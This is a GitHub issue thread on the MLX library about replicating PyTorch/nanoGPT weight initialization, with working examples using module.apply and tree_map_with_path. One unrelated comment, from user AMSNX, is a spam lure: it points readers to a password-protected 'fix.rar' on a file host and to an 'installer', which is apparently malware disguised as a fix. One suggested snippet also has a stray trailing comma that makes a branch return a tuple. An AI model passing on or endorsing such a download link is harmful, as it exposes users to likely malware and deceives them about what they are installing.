### ISSUE TITLE
Best way to initialize parameters

### ISSUE THREAD

**Issue by vgoklani** [ml-explore/mlx#1364]
The pattern that we use in pytorch for initializing weights in an LLM is:

```python
def _init_weights(self, module):
    # https://github.com/karpathy/nanoGPT/blob/master/model.py#L162C1-L168C69
    if isinstance(module, nn.Linear):
        nn.init.normal_(module.weight, mean=0.0, std=0.02)
        if module.bias is not None:
            nn.init.zeros_(module.bias)
    elif isinstance(module, nn.Embedding):
        nn.init.normal_(module.weight, mean=0.0, std=0.02)
```

and then we use `model.apply(...)`

What is the equivalent pattern in mlx? thanks!

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by awni** [comment]
There are some [examples here](https://ml-explore.github.io/mlx/build/html/python/nn/init.html#initializers). The basic pattern is pretty similar:

```python
import mlx.nn as nn
model = nn.Sequential(nn.Linear(5, 10), nn.ReLU(), nn.Linear(10, 5))
init_fn = nn.init.uniform(low=-0.1, high=0.1)
model.apply(init_fn)
```

**Comment by shakedzy** [comment]
I'd like to reopen this, as the above comment isn't answering the question - 
Things like checking the name/type of the module or even if it has a bias or not aren't trivial in MLX, as instead of initializing a module (like in the above pytorch example), MLX always works on the array of the modules, without having any context of the layer it comes from. How do I verify if the array is preceding a ReLU, for example?

**Comment by awni** [comment]
I'm not sure what you are trying to do that's difficult. A code example would help.

But there are lot's of ways to get at the [internals of a Module](https://ml-explore.github.io/mlx/build/html/python/nn.html#inspecting-modules) or you can get the [named modules here](https://ml-explore.github.io/mlx/build/html/python/nn/_autosummary/mlx.nn.Module.named_modules.html).

**Comment by shakedzy** [comment]
@vgoklani example above is taken from Andrej Karpathy's [NanoGPT](https://github.com/karpathy/nanoGPT) repo. For example, the weight initialization function looks like this:
```python
from torch import nn

def initialize_weights(module: nn.Module) -> None:
    """
    Initialize weights of the model:
    - Embedding layers: Normal initialization with std=0.02
    - Linear layers in attention: Xavier initialization
    - Linear layers in feedforward with ReLU: Kaiming initialization
    - LayerNorm: Weights set to 1, biases set to 0
    """
    if isinstance(module, nn.Embedding):
        nn.init.normal_(module.weight, mean=0.0, std=0.02)

    elif isinstance(module, nn.Linear):
        if hasattr(module, 'activation') and module.activation == 'relu':  
            # Use Kaiming for feedforward layers with ReLU
            nn.init.kaiming_uniform_(module.weight, nonlinearity='relu')
        else:
            # Use Xavier for attention layers
            nn.init.xavier_uniform_(module.weight)

        if module.bias is not None:
            nn.init.zeros_(module.bias)

    elif isinstance(module, nn.LayerNorm):
        nn.init.ones_(module.weight)
        nn.init.zeros_(module.bias)

```

[I translated the NanoGPT to MLX](https://github.com/shakedzy/nanogpt), and the same function for the same model looks like this now:
```python
from mlx import nn
from mlx.nn import init

def initialize_weights(module_name: str, module: nn.Module) -> None:
    # to be used with nn.Module.apply_to_modules
    if module.children():
        return None  # only apply init to leaf modules
    elif 'embedding' in module_name:
        module.apply(init.normal(mean=0.0, std=0.02))
    elif 'ln' in module_name:  # LayerNorm
        module.apply(
            map_fn=init.constant(1.), 
            filter_fn=lambda _, name, __: name != 'bias')
        module.apply(
            map_fn=init.constant(0.), 
            filter_fn=lambda _, name, __: name == 'bias')
    else:  # nn.Linear
        if 'ffn.layers.0' in module_name:
            # These are the linear layers with ReLU activation
            module.apply(
                map_fn=lambda a: init.he_uniform(a.dtype)(a, 'fan_in', 1.),
                filter_fn=lambda _, name, __: name != 'bias')
        else:
            module.apply(
                map_fn=lambda a: init.glorot_uniform(a.dtype)(a, 1.), 
                filter_fn=lambda _, name, __: name != 'bias')
        module.apply(
            map_fn=init.constant(0.), 
            filter_fn=lambda _, name, __: name == 'bias')
```
The `module.apply_to_modules` runs over all submodules more than once - once as the main module submodule, and another time as a standalone module (and i don't understand why that happens, it makes no sense). But, the `module.apply` works on the _arrays_ of the module - which in this case are always named either `weight` or `bias`, but the `apply` function has no context of which layer they're associated with:

- notice that in PyTorch, I can check the activation type of a layer, that can't be done in MLX
- I can't check if a layer has a `bias`
You can see I have several workarounds, like using `module.children()` to verify I'm on a leaf-module and other stuff. Overall, not the easiest way to go here..

**Comment by awni** [comment]
You can do something like this which is a bit simpler (and I think equivalent to what you are doing):

```python
from mlx.utils import tree_map_with_path

def init_fn(path, a):
    print(path)
    if "embedding" in path:
        return init.normal(mean=0.0, std=0.02)(a)
    elif "bias" in path:
        return init.constant(0.)(a)
    elif "ln" in path:
        return init.constant(1.)(a)
    elif "ffn.layers.0" in path:
        return init.he_uniform(a.dtype)(a, 'fan_in', 1.),
    return init.glorot_uniform(a.dtype)(a, 1.) 

model.update(tree_map_with_path(init_fn, model.parameters()))
```

The [tree utils](https://ml-explore.github.io/mlx/build/html/python/tree_utils.html) are good to know about

**Comment by shakedzy** [comment]
Looks pretty good, thanks! I'll take a deeper dive into trees.

**Comment by vgoklani** [comment]
@awni thanks for sharing! These `tree` utils aren't so obvious, we don't have them in pytorch!
